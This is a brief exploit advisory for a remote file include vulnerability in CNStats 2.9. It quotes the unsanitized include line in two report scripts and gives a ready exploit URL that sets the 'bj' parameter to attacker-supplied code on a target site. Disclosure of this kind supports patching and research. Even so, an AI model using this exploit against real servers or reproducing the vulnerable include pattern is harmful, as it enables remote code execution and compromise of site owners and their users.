CNStats 2.9 (who_r.php) Remote File Include Vulnerability
bug found:
/reports/who_r.php /reports/who_s.php
$bk = 't'; include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]